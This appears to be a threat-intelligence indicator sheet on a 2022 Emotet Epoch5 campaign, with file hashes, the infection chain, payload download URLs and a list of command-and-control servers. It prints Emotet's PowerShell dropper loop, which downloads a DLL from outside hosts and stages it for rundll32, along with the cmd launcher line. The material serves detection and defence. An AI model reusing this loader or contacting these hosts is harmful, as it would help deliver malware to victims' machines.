Emotet 2022
************************************************************************************************************
Epoch5 infection chain: .zip > .xls > .bat > .ps > .dll
.xls e14df4726787b5945eb94bb49efe6f14096a929d7f2b598a03cffe8ed73f48ee
.dll e88d1422221b680ca1c286ee1d72b6724906f51d72d86afdcfe96f162bf2a4f6
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3&start /B /WAIT powershell -enc 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&c:\programdata\vkwer.bat
rundll32.exe "c:\programdata\zhdkjew\vbkwk.dll",DllRegisterServer
$gdrhk4 = "hxxp://tastedonline.com/cgi-bin/14Lg3P2Dt3rqBmaYZO/", "hxxp://store.anicyber.com/wp-content/0JIWtpJt681mQ/", "hxxp://jeffreylubin.igclout.com/wp-admin/gJ5oDbi/", "hxxps://dulichkhampha24.net/wp-content/rPThO/", "hxxp://dev.learncaraudio.com/wp-admin/ZIwWVcNiED4JYqnq/", "hxxp://karensgardentips.com/cgi-bin/w9i3PIVDOJDeF095ST/", "hxxp://stancewheels.com/wp-admin/ur031GNgTubBSslqN/", "hxxp://laohange.com/wp-content/brPqH/", "hxxp://139.99.89.211/wp-admin/VM1HRb3b0MGGdp/", "hxxp://onexone.elementor.cloud/cdrxhrt/632SFiWmT1Y/", "hxxps://lastregaristorante.com/wp-admin/vkXFRVu/", "hxxp://sellin.app/wp-admin/0W4AcWvFkHkV/"
foreach ($st in $gdrhk4) {
$hbrke2 = "vbkwk"
$gsrewt4 = get-random
$hdge55rur = "c:\\programdata\\zhdkjew\\" + $hbrke2 + ".dll"
invoke-webrequest -uri $st -outfile $hdge55rur
if (test-path $hdge55rur) {
if ((get-item $hdge55rur).length -ge 50000) {
$ghddfjhk5f = "c:\\windows\\syswow64\\rundll32.exe"
$bnzr65d = $hdge55rur + ",f" + $gsrewt4
break
}
}
}
.dll distribution URLs (payload download locations)
hxxp://tastedonline.com/cgi-bin/14Lg3P2Dt3rqBmaYZO/
hxxp://store.anicyber.com/wp-content/0JIWtpJt681mQ/
hxxp://jeffreylubin.igclout.com/wp-admin/gJ5oDbi/
hxxps://dulichkhampha24.net/wp-content/rPThO/
hxxp://dev.learncaraudio.com/wp-admin/ZIwWVcNiED4JYqnq/
hxxp://karensgardentips.com/cgi-bin/w9i3PIVDOJDeF095ST/
hxxp://stancewheels.com/wp-admin/ur031GNgTubBSslqN/
hxxp://laohange.com/wp-content/brPqH/
hxxp://139.99.89.211/wp-admin/VM1HRb3b0MGGdp/
hxxp://onexone.elementor.cloud/cdrxhrt/632SFiWmT1Y/
hxxps://lastregaristorante.com/wp-admin/vkXFRVu/
hxxp://sellin.app/wp-admin/0W4AcWvFkHkV/
C2s (command-and-control servers, ip:port)
74.207.230.120:8080
139.196.72.155:8080
37.44.244.177:8080
37.59.209.141:8080
116.124.128.206:8080
217.182.143.207:443
54.37.228.122:443
203.153.216.46:443
168.197.250.14:80
207.148.81.119:8080
195.154.146.35:443
78.46.73.125:443
191.252.103.16:80
210.57.209.142:8080
185.168.130.138:443
142.4.219.173:8080
118.98.72.86:443
78.47.204.80:443
159.69.237.188:443
190.90.233.66:443
104.131.62.48:8080
62.171.178.147:8080
185.148.168.15:8080
54.38.242.185:443
198.199.98.78:8080
194.9.172.107:8080
85.214.67.203:8080
66.42.57.149:443
185.148.168.220:8080
103.41.204.169:8080
128.199.192.135:8080
195.77.239.39:8080
59.148.253.194:443